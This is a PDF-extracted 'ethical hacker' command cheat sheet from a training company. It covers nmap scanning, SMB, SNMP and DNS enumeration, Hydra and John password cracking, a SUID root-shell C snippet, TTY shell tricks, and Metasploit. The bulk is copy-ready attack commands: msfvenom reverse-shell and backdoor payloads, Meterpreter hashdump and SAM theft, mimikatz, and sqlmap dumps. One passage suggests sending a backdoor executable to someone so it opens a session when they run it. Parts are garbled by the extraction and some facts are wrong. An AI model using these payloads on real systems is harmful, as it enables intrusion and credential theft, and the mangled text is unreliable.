Cyber Warrior’s
COMMAND
GUIDE
for
ETHICAL
HACKERS
I hope that all the information shared with you here, will you provide you deeper insights
and would assist you in practicing your hacking skills effectively. I value your opinions very
highly, so kindly send me your feedback!
Follow me on Facebook:
At Cybersecurity PRISM, you gain great cybersecurity INSIGHTS. You learn the most
important TOPICS and CONCEPTS. Each content piece shared here is designed to help you
best in your learning of Cybersecurity.
Welcome to Cybersecurity Prism!
With thanks,
Meena R.
Your 'Cyberwarrior Friend’
www.luminisindia.com
© 2023 Luminis Consulting Services Private Limited, IN
https://www.facebook.com/cybersec.prism/
ATTENTION BEGINNERS
If you want to start,
or grow an outstanding
cybersecurity career,
you need PASSPORT.
T
OR
SP
S
PA
Cybersecurity
Career
PASS PORT
© 2023 Luminis Consulting Services Private Limited, IN
Gateway To Cybersecurity
Check at:
https://luminisindia.com/goehm
www.luminisindia.com
Command Guide For Hackers
The Command Guide for Kali
Commands are the faster way to get the output you desire when you work on your way to become a proficient
ethical hacker. This guide is my collection of most important commands which I have compiled over the years.
You would be working with these commands day-in and day-out!
Kindly note that many commands have example IP addresses, subnet or host names. Use your intelligence!
sudo apt install
sudo apt remove
sudo apt purge
sudo apt update
sudo apt upgrade
sudo apt autoremove
sudo apt full-upgrade
sudo apt search
sudo apt show
sudo apt list
sudo apt edit-sources
Installs a package
Removes a package
Removes package with configuration
Refreshes repository index
Upgrades all upgradable packages
Removes unwanted packages
Upgrades packages with auto-handling of dependencies
Searches for a program
Shows package details
Lists packages with criteria (installed, upgradable etc)
Edits sources list
sudo apt clean
The clean command clears out the local repository of downloaded
package files. It removes everything except the partials folder and lock file
from /var/cache/apt/archives/. Use apt clean to free up disk space when
necessary, or as part of regularly scheduled maintenance.
sudo apt clean
The autoclean is another method used to clear out the local repository of
downloaded package files, just like clean. The difference between clean
and autoclean is that the latter only removes package files that can no
longer be downloaded from their sources, and are very likely to be
useless.
Some of these commands can be used in combinations. For example:
sudo apt update && sudo apt upgrade -y && sudo apt full-upgrade -y && sudo apt autoremove -y
Installing packages
yum install package_name
yum info package_name
yum remove package_name
rpm -I package_name.rpm
If you want to install from Source Code
Installs a package
Displays brief details about a package
Removes or uninstalls the package
Installs package from local rpm-file
tar zxvf sourcecode.tar.gz
cd sourcecode
./configure
make
make install
www.luminisindia.com
© 2023 Luminis Consulting Services Private Limited, IN
Update/Upgrade Linux
First things to do after installing Linux:
sudo apt update && sudo apt upgrade
sudo apt install gnome-tweak-tool
sudo apt install git
sudo apt install python3-pip
Downloads and Installs Latest Updates
Installs GNOME Tweak Tool
Installs Git
Installs PIP
If you want to install GNOME Extensions, Just go to:
https://extensions.gnome.org/ and install your preferred extensions.
Play With Different Desktop Environment
sudo apt install Ubuntu-mate-desktop
sudo apt-get install kde-standard
sudo apt-get install cinnamon-desktop-environment
To try MATE, run this command!
To try KDE, run this command!
To try Cinnamon, run this command!
DPKG Tool
dpkg -I ~/Downloads/file.deb
It is a tool for installing, removing, and querying individual packages.
How to fix HTB openvpn connection issue?
VIRTUAL MACHINE NETWORK TYPES
Bridge mode
NAT
Host Only
Custom
This connects the virtual network adapter directly to the physical network.
This allows the virtual network adapter to share the host's IP address.
This creates a private network that the virtual network adapter shares with the host.
This allows you to create your own virtual network.
www.luminisindia.com
© 2023 Luminis Consulting Services Private Limited, IN
Troubleshooting
# vim /etc/sysctl.conf
Also set following to 0:
net.ipv6.conf.all.disable_ipv6 = 0
net.ipv6.conf.default.disable_ipv6 = 0
net.ipv6.conf.lo.disable_ipv6 = 0
nMAP
nmap 1.1.1.1
nmap cloudflare.com
nmap -p 1-65535 localhost
nmap -p 80, 443 8.8.8.8
nmap 1.1.1.1 8.8.8.8
nmap -p 1.1.1.1,2,3,4
Scans against IP address
Scans against a host name
Scans entire port ranges on a local or remote server
Scans a specific port, e.g., 80 & 443 at IP: 8.8.8.8
Scans multiple IP addresses, e.g., 1.1.1.1 and 8.8.8.8 here
Scans multiple consecutive IP addresses. This will scan
1.1.1.1, 1.1.1.2, 1.1.1.3 and 1.1.1.4 here.
nmap -p 8.8.8.0/28 or
nmap 8.8.8.1-14
Scan the given IP ranges. Both these commands will scan
14 consecutive IP ranges, from 8.8.8.1 to 8.8.8.14.
nmap 8.8.8.*
You can even use wildcards to scan the entire C class IP
range. For example, this command will scan 256 IP
addresses from 8.8.8.1 to 8.8.8.256.
Scan the given IP ranges with the exclusion you define,
e.g., the IP address 8.8.8.14 will be excluded from scan.
nmap -p 8.8.8.* --exclude 8.8.8.14
nmap --top-ports 20 192.168.1.106
Scans the most commonly used all ports, along with any
specifically defined port, e.g., 20 will be specifically
scanned along with all most common ports.
nmap -iL list.txt
Scans all the IP addresses and host names which are
contained in a txt-file, which you may have.
nmap -oN output.txt securitytrails.com
Scans all the IP addresses or host and will saved the results
in a txt file. For example, the scanned results of scanning
host ‘securitytrails.com’ will be saved in output.txt file.
nmap -p 80 -n 8.8.8.8
Suppose you want to speed up your scans a little bit, then
you can always choose to disable reverse DNS resolution
for all your scans. Just add the “-n” parameter.
Scans and find out the OS and other services running on
the host, e.g., cloudflare.com. The switch of -T4 will speed
up the task of scanning!
nmap -A -T4 cloudflare.com
nmap -sV localhost
Scans and detects the service/daemon versions
nmap -Pn --script vuln 192.168.1.105
One of Nmap's greatest features. If you want to run a full
vulnerability test against your target, e.g., 192.168.1.105.
This command will launch a bruteforce on IP:
192.168.1.105 on port 21 via FTP
nmap --script ftp-brute -p 21 192.168.1.105
nmap 10.10.10.50 -p 3306
This command will scan for MySQL on port 3306 at IP
address: 10.10.10.50.
www.luminisindia.com
© 2023 Luminis Consulting Services Private Limited, IN
Nmap (“Network Mapper”) is a free and open source utility for network discovery and security auditing. Many
systems and network administrators also find it useful for tasks such as network inventory, managing service
upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine
what hosts are available on the network, what services (application name and version) those hosts are offering,
what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and
dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts.
Nmap runs on all major computer operating systems, and official binary packages are available for Linux,
Windows, and Mac OS X. Some examples of regular commands are given below:
Power Commands for NMAP
nmap -v -sS -A -T4 <target>
This command runs Nmap verbose scan, runs syn stealth,
T4 timing (it should be ok on LAN), detects OS and service
version info, executes traceroute and scripts against
services at your target host or IP address.
nmap -v -sS -p–A -T4 <target>
As above but scans all TCP ports (takes a lot longer)
nmap -v -sU -sS -p- -A -T4 <target>
As above but scans all TCP ports and UDP scan (takes even
longer)
nmap -v -p 445 –script=smb-check-vulns –script-args=unsafe=1 192.168.1.X
Nmap script to scan for vulnerable SMB servers –
WARNING: unsafe=1 may cause knockover
nmap -v -sS -p–A -T4 <target>
As above but scans all TCP ports (takes a lot longer)
nmap localhost
Displays all the ports that are currently in use
ls /usr/share/nmap/scripts/* | grep ftp
Search nmap scripts for keywords
© 2023 Luminis Consulting Services Private Limited, IN
NOTE: You replace <target> with actual IP address of your target machine or host name.
www.luminisindia.com
Enumeration
SMB Enumeration
In computer networking, Server Message Block (SMB), one version of which was also known as Common Internet
File System (CIFS, /ˈsɪfs/), operates as an application-layer network protocol mainly used for providing shared
access to files, printers, and serial ports and miscellaneous communications between nodes on a network.
Two commands are highly useful in enumerating Windows shares / Samba shares:
nbtscan 192.168.1.0/24
enum4linux -a target-ip
Discovers Windows / Samba servers on subnet, finds
Windows MAC addresses, netbios name and discover
client workgroup / domain
Does everything, runs all options (find windows client
domain / workgroup) apart from dictionary based share
name guessing
Discovering Hosts without using NMAP
netdiscover -r 192.168.1.0/24
Discovers IP, MAC Address and MAC vendor on the subnet
from ARP, helpful for confirming you're on the right VLAN
at client site
Python Local Web Server
Python local web server command, handy for serving up shells and exploits on a target machine.
python -m SimpleHTTPServer 80
Runs a basic http server, great for serving up shells etc
Mounting File Shares
mount 192.168.1.1:/vol/share /mnt/nfs
Mounts NFS share to /mnt/nfs
mount -t cifs -o username=user,password=pass, domain=blah //192.168.1.X/share-name /mnt/cifs
Mounts Windows CIFS / SMB share on Linux at /mnt/cifs if
you remove password it will prompt on the CLI (more
secure as it wont end up in bash_history)
net use Z:\\win-server\share password /user:domain\<janedoe> /savecred /p:no
Mounts a Windows share on Windows from the command
line. Replace the <janedoe> will actual user name here.
apt-get install smb4k -y
Installs smb4k on Kali, useful Linux GUI for browsing SMB
shares
www.luminisindia.com
© 2023 Luminis Consulting Services Private Limited, IN
Following commands will greatly help you to mount NFS / CIFS, Windows and Linux file shares:
Basic Fingerprinting
A device fingerprint or machine fingerprint or browser fingerprint is information collected about a remote
computing device for the purpose of identification. Fingerprints can be used to fully or partially identify individual
users or devices even when cookies are turned off.
nc -v 192.168.1.1 25
Basic versioning / fingerprinting via displayed banner
telnet 192.168.1.1 25
Basic versioning / fingerprinting via displayed banner
SNMP Enumeration
SNMP enumeration is the process of using SNMP to enumerate user accounts on a target system.
SNMP employs two major types of software components for communication:
1. The SNMP agent, which is located on the networking device, and
2. The SNMP management station, which communicates with the agent.
snmpcheck -t 192.168.1.X -c public
snmpwalk -c public -v1 192.168.1.X 1 |grep hrSWRunName |cut -d* * -f
snmpenum -t 192.168.1.X onesixtyone -c names -i hosts
DNS Zone Transfers
nslookup -> set type=any -> ls -d blah.com
Windows DNS zone transfer
dig axfr blah.com @ns1.blah.com
Linux DNS zone transfer
DNSRecon
1.
2.
3.
4.
5.
6.
7.
Check all NS Records for Zone Transfers
Enumerate General DNS Records for a given Domain (MX, SOA, NS, A, AAAA, SPF and TXT)
Perform common SRV Record Enumeration. Top Level Domain (TLD) Expansion
Check for Wildcard Resolution
Brute Force subdomain and host A and AAAA records given a domain and a wordlist
Perform a PTR Record lookup for a given IP Range or CIDR
Check a DNS Server Cached records for A, AAAA and CNAME Records provided a list of host records in a
text file to check
8. Enumerate Common mDNS records in the Local Network Enumerate Hosts and Subdomains using Google
Here is the command to carry out DNSRecon at command terminal:
DNS Enumeration Kali DNSReconroot:~# dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
www.luminisindia.com
© 2023 Luminis Consulting Services Private Limited, IN
DNSRecon provides the ability to perform so many of important tasks. For example
HTTP / HTTPS Webserver Enumeration
nikto -h 192.168.1.1
Perform a nikto scan against target
dirbuster
Configure via GUI, CLI input doesn't work most of the time
Packet Inspection
tcpdump tcp port 80 -w output.pcap -i eth0
This command generates a tcpdump for port 80 on
interface eth0, and save the output to file:output.pcap
Username Enumeration
SMB Username Enumeration
python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX
This command enumerate users from SMB.
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt
This command uses RID cycle SMB / enumerate users from
SMB.
SNMP Username Enumeration
snmpwalk public -v1 192.168.X.XXX 1 |grep 77.1.2.25 |cut -d” “ -f4
This command enumerates users from SNMP.
python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt
(then grep)
This command searches for SNMP servers with nmap,
grepable output
www.luminisindia.com
© 2023 Luminis Consulting Services Private Limited, IN
This command also enumerates users from SNMP.
Attacking The Passwords
Wordlists
Ÿ It all begins with a collection of wordlists. For cracking passwords, you might have two choices:
1. Dictionary Attack
2. Brute Force Attack.
The Dictionary attack is much faster then as compared to Brute Force Attack. (There is another method named
as “Rainbow table”, it is similar to Dictionary attack). In order to achieve success in a dictionary attack, you
need a maximum size of Password lists.
/usr/share/wordlists
This command specifies the path to your wordlist(s)
Hydra FTP Brute Force
Ÿ Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible,
and new modules are easy to add. This tool makes it possible for researchers and security consultants to
show how easy it would be to gain unauthorized access to a system remotely. On Kali Linux, it is perinstalled.
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX ftp -V
This command executes Hydra FTP brute force.
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V
This command executes Hydra POP3 brute force.
hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V
This command executes Hydra SMTP brute force.
You can use -t in these commands to limit concurrent connections, example: -t 15
Ÿ John the Ripper is different from tools like Hydra. Hydra does blind brute-forcing by trying
username/password combinations on a service daemon like ftp server or telnet server. John however needs
the hash first. So the greater challenge for a hacker is to first get the hash that is to be cracked. Now a days
hashes are more easily crackable using free rainbow tables available online. Just go to one of the sites,
submit the hash and if the hash is made of a common word, then the site would show the word almost
instantly. Rainbow tables basically store common words and their hashes in a large database. Larger the
database, more the words covered.
john –wordlist=/usr/share/wordlists/rockyou.txt hashes
This command executes JTR password cracking.
john –format=descrypt –wordlist /usr/share/wordlists/rockyou.txt hash.txt
This command executes forced descrypt cracking with
wordlist
john –format=descrypt hash –show
This command executes Hydra SMTP brute force.
www.luminisindia.com
© 2023 Luminis Consulting Services Private Limited, IN
John The Ripper
Searching Exploits
There are many ways to find exploits for enumerated hosts/services.
searchsploit windows 7 | grep -i local
This command searches exploit-db for exploit, in this
example windows 7 + local esc
site:exploit-db.com exploit kernel <= 3
This command uses Google to search exploit-db.com for
exploits
grep -R “W7” /usr/share/metasploit-framework/modules/exploit/windows/*
This command searches metasploit modules using grep. It
is usually slow process!
Compiling Exploits
Identifying if C code is for Windows or Linux
C-language #includes will indicate you about what OS system you should use for compiling new exploits, e.g.,
process.h, string.h, winbase.h, windows.h, winsock2.h
The presence of these files indicates that you should write
Windows exploit code.
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h
The presence of these files indicates that you should write
Linux exploit code.
Build Exploit GCC
gcc -o exploit exploit.c
This commands executes Basic GCC exploit.
gcc -m32 exploit.c -o exploit
This commands compiles 32-bit binary on 64-bit Linux.
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
SUID Binary
Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell
as required.
Here are some quick copy and pate examples for various shells:
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
iint main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}
This is SUID C Shell for /bin/bash.
This is SUID C Shell for /bin/sh.
gcc -o suid suid.c
This commands builds 64-bit SUID Shell binary.
gcc -m32 -o suid suid.c
This commands builds 32-bit SUID Shell binary.
www.luminisindia.com
© 2023 Luminis Consulting Services Private Limited, IN
This command builds or compiles windows exploits on
Linux, resulting in a .exe file.
TTY Shells
Tips/Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse
shells.
python -c 'import pty;pty.spawn("/bin/bash")’
Python TTY Shell Trick
echo os.system('/bin/bash')
/bin/sh -i
Spawn Interactive sh shell
exec "/bin/sh";
Spawn Perl TTY Shell
perl —e 'exec "/bin/sh";'
Spawn Ruby TTY Shell
os.execute('/bin/sh')
Spawn Lua TTY Shell
:!bash
Runs shell commands from vi
!sh
Spawn TTY Shell NMAP
© 2023 Luminis Consulting Services Private Limited, IN
exec "/bin/sh"
www.luminisindia.com
Metasploit
Metasploit is one of the most powerful and widely used tools for penetration testing.
You would set the Metasploit up with following command set:
systemctl start postgresq
msfdb init
db_status
?
background
bg
bgkill
bglist
bgrun
channel
close
disable_unicode_encoding
enable_unicode_encoding
exit
get_timeouts
guid
help
info
irb
load
machine_id
migrate
pivot
pry
quit
read
resource
run
secure
sessions
set_timeouts
sleep
transport
use
uuid
write
Stdapi:
Help menu
Backgrounds the current session
Alias for background
Kills a background meterpreter script
Lists running background scripts
Executes a meterpreter script as a background thread
Displays information or control active channels
Closes a channel
Disables encoding of unicode strings
Enables encoding of unicode strings
Terminate the meterpreter session
Get the current session timeout values
Get the session GUID
Help menu
Displays information about a Post module
Open an interactive Ruby shell on the current session
Load one or more meterpreter extensions
Get the MSF ID of the machine attached to the session
Migrate the server to another process
Manage pivot listeners
Open the Pry debugger on the current session
Terminate the meterpreter session
Reads data from a channel
Run the commands stored in a file
Executes a meterpreter script or Post module
(Re)Negotiate TLV packet encryption on the session
Quickly switch to another session
Set the current session timeout values
Force Meterpreter to go quiet, then re-establish session.
Change the current transport mechanism
Deprecated alias for "load"
Get the UUID for the current session
Writes data to a channel
File system Commands
www.luminisindia.com
© 2023 Luminis Consulting Services Private Limited, IN
Here is the collection of CORE commands of Metasploit:
Generating Payloads With Metasploit
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.141 LPORT=4444 -f exe -o payload.exe
This is example Metasploit command which creates an executable backdoor: The backdoor.exe, which is saved
in the path where you executes the command. You can upload this file to GitHub or send it to someone, once
they open it, your meterpreter session will start where LHOST= Your IP, and RHOST= Target IP
Commands for generating Metasploit payloads:
msfvenom -l
This command lists the payloads.
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f elf >
shell.elf
This command generates a Linux Meterpreter Reverse
Shell payload.
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf >
bind.elf shell.elf
This command generates a Linux Bind Meterpreter Shell
payload.
msfvenom -p generic/shell_bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > term.elf
This command generates a Linux Bind Shell payload.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe >
shell.exe
This command generates a Windows Meterpreter Reverse
TCP Shell payload.
msfvenom -p windows/shell/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe
This command generates a Windows Reverse TCP Shell
payload.
This command generates a Windows Encoded Meterpreter
Windows Reverse Shell payload.
msfvenom -p windows/adduser USER=hacker PASS=Hacker123$ -f exe > adduser.exe
This command generates a payload for creating a Windows
User.
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f macho >
shell.macho
This command generates a Mac Reverse Shell payload.
msfvenom -p osx/x86/shell_bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f macho >
bind.macho
This command generates a Mac Bind Shell payload.
www.luminisindia.com
© 2023 Luminis Consulting Services Private Limited, IN
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
Web Payloads With Metasploit
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
This command-set generates a PHP Meterpreter Reverse
TCP payload.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f asp >
shell.asp
This command generates a ASP Meterpreter Reverse TCP
payload.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.jsp
This command generates a JSP Java Meterpreter Reverse
TCP payload.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f war > shell.war
This command generates a WAR payload.
Scripting Payloads With Metasploit
msfvenom -p cmd/unix/reverse_python LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.py
This command generates a Python Reverse Shell payload.
msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh
This command generates a Bash Unix Reverse Shell
payload.
msfvenom -p cmd/unix/reverse_perl LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.pl
This command generates a Perl Unix Reverse shell payload.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f
<language>
This command generates a Windows Meterpreter Reverse
TCP Shellcode payload.
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f
<language>
This command generates a Linux Meterpreter Reverse TCP
Shellcode payload.
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>
This command generates a Mac Meterpreter Reverse TCP
Shellcode payload.
www.luminisindia.com
© 2023 Luminis Consulting Services Private Limited, IN
Shell Code Payloads With Metasploit
Useful Meterpreter Commands
upload file c:\\windows
Meterpreter uploads file to Windows target
download c:\\windows\\repair\\sam /tmp Meterpreter downloads file from Windows target
execute -f c:\\windows\temp\exploit.exe Meterpreter runs .exe on target – handy for executing
uploaded exploits
execute -f cmd -c
Creates new channel with cmd shell
ps
Meterpreter shows processes
shell
Meterpreter gets shell on the target
getsystem
Meterpreter attempts priviledge escalation the target
hashdump
Meterpreter attempts to dump the hashes on the target
portfwd add –l 3389 –p 3389 –r target
Meterpreter creates port forward to target machine
portfwd delete –l 3389 –p 3389 –r target Meterpreter deletes port forward
Common Metasploit Modules
Remote Windows Metasploit Modules (exploits)
MS08_067 Windows 2k, XP, 2003 Remote Exploit
MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit
use exploit/windows/smb/ms06_040_netapi
use exploit/windows/dcerpc/ms08_067_netapi
This command runs remote exploit on Windows NT, 2k, XP,
2003 based target machines.
This command runs remote exploit on Windows 2k, XP,
2003 based target machines.
This command runs remote exploit on Windows Vista
SP1/SP2 and Server 2008 (x86) based target machines.
Local Windows Metasploit Modules (exploits)
use exploit/windows/local/bypassuac
This command runs to bypass UAC on Windows 7 + Set
target + arch, x86/64
www.luminisindia.com
© 2023 Luminis Consulting Services Private Limited, IN
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
Useful Auxilary Metasploit Modules
use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/http/jboss_vulnscan
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/mysql/mysql_version
use auxiliary/scanner/oracle/oracle_login
Metasploit HTTP directory scanner
Metasploit JBOSS vulnerability scanner
Metasploit MSSQL Credential Scanner
Metasploit MSSQL Version Scanner
Metasploit Oracle Login Module
Metasploit Powershell Modules
use exploit/multi/script/web_delivery
use exploit/multi/http/jboss_maindeployer
use exploit/windows/mssql/mssql_payload
Metasploit powershell payload delivery module
Metasploit JBOSS deploy
Metasploit MSSQL payload
post/windows/manage/powershell/exec_powershell
This command will let Metasploit upload and run
powershell script through a session.
Post Exploit Windows Metasploit Modules
run post/windows/gather/win_privs
Metasploit shows privileges of current user
use post/windows/gather/credentials/gpp
Metasploit grabs GPP saved passwords
load mimikatz -> wdigest
Metasploit loads Mimikatz
run post/windows/gather/local_admin_search_enum
© 2023 Luminis Consulting Services Private Limited, IN
This command helps you idenitfy other machines that the
supplied domain user has administrative access to.
www.luminisindia.com
Networking Re-visited
TTL Fingerprinting
Operating System
TTL Size
Windows
128
Linux
64
Solaris
255
Cisco/Network
255
Ipv4 Classful IP Address Ranges
Class
IP Address Range
Class A
0.0.0.0 – 127.255.255.255
Class B
128.0.0.0 – 191.255.255.255
Class C
192.0.0.0 – 223.255.255.255
Class D
224.0.0.0 – 239.255.255.255
Class E
240.0.0.0 – 255.255.255.255
* Class A, B and C haven been depreciated.
Class
© 2023 Luminis Consulting Services Private Limited, IN
Ipv4 Private IP Address Ranges
IP Address Range
Class A
10.0.0.0 – 10.255.255.255
Class B
172.16.0.0 – 172.31.255.255
Class C
192.168.0.0 – 192.168.255.255
127.0.0.0 – 127.255.255.255
www.luminisindia.com
Networking Re-visited
IPv4 Subnet Cheat Sheet
Decimal Mask
Number of Hosts
/31
255.255.255.254
1 Host
/30
255.255.255.252
2 Hosts
/29
255.255.255.248
6 Hosts
/28
255.255.255.240
14 Hosts
/27
255.255.255.224
30 Hosts
/26
255.255.255.192
62 Hosts
/25
255.255.255.128
126 Hosts
/24
255.255.255.0
254 Hosts
/23
255.255.254.0
512 Host
/22
255.255.252.0
1022 Hosts
/21
255.255.248.0
2046 Hosts
/20
255.255.240.0
4094 Hosts
/19
255.255.224.0
8190 Hosts
/18
255.255.192.0
16382 Hosts
/17
255.255.128.0
32766 Hosts
/16
255.255.0.0
65534 Hosts
/15
255.254.0.0
131070 Hosts
/14
255.252.0.0
262142 Hosts
/13
255.248.0.0
524286 Hosts
/12
255.240.0.0
1048674 Hosts
/11
255.224.0.0
2097150 Hosts
/10
255.192.0.0
4194302 Hosts
/9
255.128.0.0
8388606 Hosts
/8
255.0.0.0
16777214 Hosts
© 2023 Luminis Consulting Services Private Limited, IN
CIDR
www.luminisindia.com
ASCII Table Cheat Sheet
Character
ASCII
Character
x00
Null Byte
x39
9
x08
BS
x3a
:
x09
TAB
x3b
;
x0a
LF
x3c
<
x0d
CR
x3d
=
x1b
ESC
x3e
>
x20
SPC
x3f
?
x21
!
x40
@
x22
“
x41
A
x23
#
x42
B
x24
$
x43
C
x25
%
x44
D
x26
&
x45
E
x27
`
x46
F
x28
(
x47
G
x29
)
x48
H
x2a
*
x49
I
x2b
+
x4a
J
x2c
’
x4b
K
x2d
-
x4c
L
x2e
.
x4d
M
x2f
/
x4e
N
x30
0
x4f
O
x31
1
x50
P
x32
2
x51
Q
x33
3
x52
R
x34
4
x53
S
x35
5
x54
T
x36
6
x55
U
x37
7
x56
V
x38
8
x57
W
www.luminisindia.com
© 2023 Luminis Consulting Services Private Limited, IN
ASCII
ASCII
Character
ASCII
Character
X
x77
w
x59
Y
x78
x
x5a
Z
x79
y
x5b
[
x7a
z
x5c
\
x5d
]
x5e
^
x5f
_
x60
`
x61
a
x62
b
x63
c
x64
d
x65
e
x66
f
x67
g
x68
h
x69
I
x6a
j
x6b
k
x6c
l
x6d
m
x6e
n
x6f
o
x70
p
x71
q
x72
r
x73
s
x74
t
x75
u
x76
v
© 2023 Luminis Consulting Services Private Limited, IN
x58
www.luminisindia.com
A Collection of Useful Cisco IOS Commands
Enters enable mode
Short for, configure terminal
Configure FastEthernet 0/0
Add ip to fa0/0
Add ip to fa0/0
Configure vty line
Cisco set telnet password
Set telnet password
Show running config loaded in memory
Show startup config
Show cisco IOS version
Display open sessions
Show network interfaces
Show detailed interface info
Show routes
Show access lists
Show available files
File information
Show deleted files
No limit on terminal output
Copies running config to tftp server
Copy startup-config to running-config
© 2023 Luminis Consulting Services Private Limited, IN
enable
conf t
(config)# interface fa0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255
(config-if)# ip addr 0.0.0.0 255.255.255.255
(config-if)# line vty 0 4
(config-line)# login
(config-line)# password YOUR-PASSWORD
# show running-config
# show startup-config
# show version
# show session
# show ip interface
# show interface e0
# show ip route
# show access-lists
# dir file systems
# dir all-filesystems
# dir /all
# terminal length 0
# copy running-config tftp
# copy running-config startup-config
www.luminisindia.com
SQLMap Examples
SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL
injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche
features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting,
over data fetching from the database, to accessing the underlying file system and executing commands on the
operating system via out-of-band connections.
sqlmap -u http://meh.com –forms –batch –crawl=10 –cookie=jsessionid=54321 –level=5 –risk=3
This command runs Automated sqlmap scan on the
targeted host.
sqlmap -u TARGET -p PARAM –data=POSTDATA –cookie=COOKIE –level=3 –current-user –current-db
This command runs targeted sqlmap scan on the host.
sqlmap -u “http://meh.com/meh.php?id=1” –dbms=mysql –tech=U –random-agent –dump
This command scans url for union + error based injection
with MySql backend.
sqlmap -o -u “http://meh.com/form/” –forms
This command checks the form at host for SQL injection.
This command dumps and cracks hashes for table users on
database-name.
www.luminisindia.com
© 2023 Luminis Consulting Services Private Limited, IN
sqlmap -o -u “http://meh.com/vuln-form” –forms -D database-name -T users –dump
Are you following my Facebook page 'Cybersecurity PRISM' at https://www.facebook.com/cybersec.prism/ ?
There is a pinned post there on the top that shows the right procedure to FOLLOW. If you do that, then
Facebook would send you a notification EVERYTIME I publish something new at my Facebook page.
Follow me on Facebook:
There are 300+ videos on various topics related to cybersecurity. There are many hundred posts on
cybersecurity too. Kindly visit there and explore. I am sure that you would enjoy your learning of cybersecurity
there at Cybersecurity PRISM.
If you still have some questions left in your mind, you can leave me your message there at 'Cybersecurity
PRISM.’
With Thanks,
MEENA R.
CIN: U72900DL2013PTC255612
Luminis Consulting Services Private Limited
J-45, 2nd Floor, Street - 7, Beriwala Bagh, Hari Nager, New Delhi - 110064 India
Email : info@luminisindia.com
www.luminisindia.com
© 2023 Luminis Consulting Services Private Limited, IN
https://www.facebook.com/cybersec.prism/